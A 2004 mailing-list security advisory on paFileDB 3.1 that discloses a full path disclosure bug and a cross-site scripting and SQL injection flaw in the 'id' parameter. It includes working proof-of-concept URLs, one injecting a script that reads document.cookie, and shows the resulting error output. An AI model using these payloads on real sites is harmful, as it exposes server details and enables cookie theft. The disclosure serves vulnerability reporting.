Multiple vulnerabilities paFileDB

["k1LL3r B0y" <k1ll3rb0y () hotmail com>]

Advisory: http://bichosoft.webcindario.com/advisory-04.txt


#########################################################################
###################### :.: DarkBicho :.: ################################
#                                                                       #
#   PROGRAM: paFileDB                                                   #
#   VERSION: 3.1                                                        #
#   URL: http://www.phparena.net                                        #
#   BUG: Multiple vulnerabilities                                       #
#   DATE: 27/04/2004                                                    #
#   AUTHOR: DarkBicho                                                   #
#           WebSite: http://www.darkbicho.tk                            #
#           Email: darkbicho () peru com                                        #
#           Team: Security Wari Projects <www.swp-zone.org>               #
#                                                                       #
#########################################################################
#########################################################################



1.- Vulnerabilities:
   ---------------


A. Full path disclosure:

This vulnerability would allow a remote user to determine the full
path to the web root directory and other potentially sensitive information.

http://site/includes/admin/login.php?formname=DarkBicho&formpass=DarkBicho
&B1=%3E%3E+Log+In+%3C%3C&action=admin&login=do

and we get standard error messages, revealing the full path to the nuke 
engine scripting files:

Fatal error: Call to undefined function: locbar() in 
/home/site/includes/admin/login.php
on line 12

http://localhost/includes/category.php
http://localhost/includes/search.php
http://localhost/includes/main.php
http://localhost/includes/viewall.php
http://localhost/includes/download.php
http://localhost/includes/email.php
http://localhost/includes/file.php
http://localhost/includes/rate.php
http://localhost/includes/stats.php

2. Cross-Site Scripting aka XSS:
  ----------------------------


 Cross-Site Scripting in id variable:


 
http://localhost/pafiledb.php?action=category&id=&apos;<script>alert(document.cookie);</script>


paFileDB was unable to successfully run a MySQL query.
MySQL Returned this error: You have an error in your SQL syntax near 
'(document.cookie);'' at line 1 Error number: 1064
The query that caused this error was: SELECT * FROM pafiledb_cat WHERE 
cat_id = '''


3.- SOLUTION:
    ¨¨¨¨¨¨¨¨
   Vendors were contacted many weeks ago and plan to release a fixed 
version soon.
   Check the Video Gallery website for updates and official release 
details.


4.- Greetings:
   ---------

   greetings to my Peruvian group swp and perunderforce :D
   "El pisto es y sera peruano"

5.- Contact
   -------

        WEB: http://www.darkbicho.tk
        EMAIL: darkbicho () peru com


---------------------------------- [ EOF ] 
------------------------------------

_________________________________________________________________
MSN Amor: busca tu ½ naranja http://latam.msn.com/amor/